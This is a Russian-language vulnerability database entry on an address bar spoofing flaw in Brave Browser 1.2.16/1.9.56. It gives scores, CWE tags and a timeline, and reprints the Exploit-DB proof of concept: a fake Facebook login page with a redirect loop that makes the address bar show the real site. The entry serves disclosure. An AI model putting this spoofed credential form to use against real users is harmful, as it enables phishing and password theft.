Brave Browser 1.2.16/1.9.56 Address Bar слабая аутентификация

CVSS Meta Temp ScoreТекущая цена эксплойта (≈)Балл интереса CTI
5.9$0-$5k0.00

СводкаИнформация

В Brave Browser 1.2.16/1.9.56 была найдена уязвимость, классифицированная как критический. Неизвестная функция компонента Address Bar используется. Осуществление манипуляции приводит к слабая аутентификация. Атака может быть инициирована удаленно. Кроме того, имеется доступный эксплойт.

ПодробностиИнформация

В Brave Browser 1.2.16/1.9.56 была найдена уязвимость, классифицированная как критический. Неизвестная функция компонента Address Bar используется. Осуществление манипуляции приводит к слабая аутентификация. Декларирование проблемы с помощью CWE приводит к CWE-290. Информация о слабости была опубликована 08.01.2017 под номером EDB-ID 40994 как Эксплойт (Exploit-DB). Документ доступен для загрузки по адресу exploit-db.com.

Атака может быть инициирована удаленно. Техническая информация отсутствует. Уровень популярности этой уязвимости ниже среднего значения. Кроме того, имеется доступный эксплойт. Эксплойт опубликован и может быть использован. На данный момент актуальная стоимость эксплойта может быть около USD $0-$5k. В рекомендациях указано следующее:

Brave Browser Suffers from Address Bar Spoofing Vulnerability. Address Bar spoofing is a critical vulnerability in which any attacker can spoof the address bar to a legit looking website but the content of the web-page remains different from the Address-Bar display of the site.

Присвоено значение Доказательство концепции. Эксплойт доступен по адресу exploit-db.com. В случае 0-day эксплойта, предполагаемая цена на подпольном рынке была около $0-$5k. Исходный код эксплойта:

<html>
<title>Address Bar spoofing Brave</title>
<h1> This is Dummy Facebook </h1>
<form>
Email: <input type="text" name="username" placeholder="add email"><br>
Password: <input type="text" name="password" placeholder="pass">
<script>
function f()
{
location = "https://facebook.com"
}
setInterval("f()", 10);
</script>
</html>

ПродуктИнформация

Поставщик

Имя

Версия

CPE 2.3Информация

CPE 2.2Информация

CVSSv4Информация

VulDB Вектор: 🔍
VulDB Надёжность: 🔍

CVSSv3Информация

VulDB Meta Base Score: 6.5
VulDB Meta Temp Score: 5.9

VulDB Базовый балл: 6.5
VulDB Временная оценка: 5.9
VulDB Вектор: 🔍
VulDB Надёжность: 🔍

CVSSv2Информация

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
ВекторСложностьАутентификацияКонфиденциальностьЦелостностьДоступность
РазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокировать
РазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокировать
РазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокироватьРазблокировать

VulDB Базовый балл: 🔍
VulDB Временная оценка: 🔍
VulDB Надёжность: 🔍

ЭксплуатацияИнформация

Класс: слабая аутентификация
CWE: CWE-290 / CWE-287
CAPEC: 🔍
ATT&CK: 🔍

Физический: Нет
Локальный: Нет
Удалённый: Да

Доступность: 🔍
Доступ: публичный
Статус: Доказательство концепции
Автор: Aaditya Purani
Язык программирования: 🔍
Скачать: 🔍
Прогноз цен: 🔍
Оценка текущей цены: 🔍

0-DayРазблокироватьРазблокироватьРазблокироватьРазблокировать
СегодняРазблокироватьРазблокироватьРазблокироватьРазблокировать

Exploit-DB: 🔍

Разведка угрозИнформация

Интерес: 🔍
Активные акторы: 🔍
Активные группы APT: 🔍

КонтрмерыИнформация

Рекомендация: о смягчении не известно
Статус: 🔍

0-дневное время: 🔍
Задержка эксплуатации: 🔍

ХронологияИнформация

08.01.2017 🔍
08.01.2017 +0 дни 🔍
08.01.2017 +0 дни 🔍
09.01.2017 +1 дни 🔍
16.07.2020 +1284 дни 🔍

ИсточникиИнформация

Консультация: EDB-ID 40994
Статус: Не определено

GCVE (VulDB): GCVE-100-95101
scip Labs: https://www.scip.ch/en/?labs.20161013

ВходИнформация

Создано: 09.01.2017 09:05
Обновлено: 16.07.2020 14:11
Изменения: 09.01.2017 09:05 (46), 16.07.2020 14:11 (2)
Завершенный: 🔍
Cache ID: 216:273:103

If you want to get the best quality for vulnerability data then you always have to consider VulDB.

Обсуждение

Interested in the pricing of exploits?

See the underground prices here!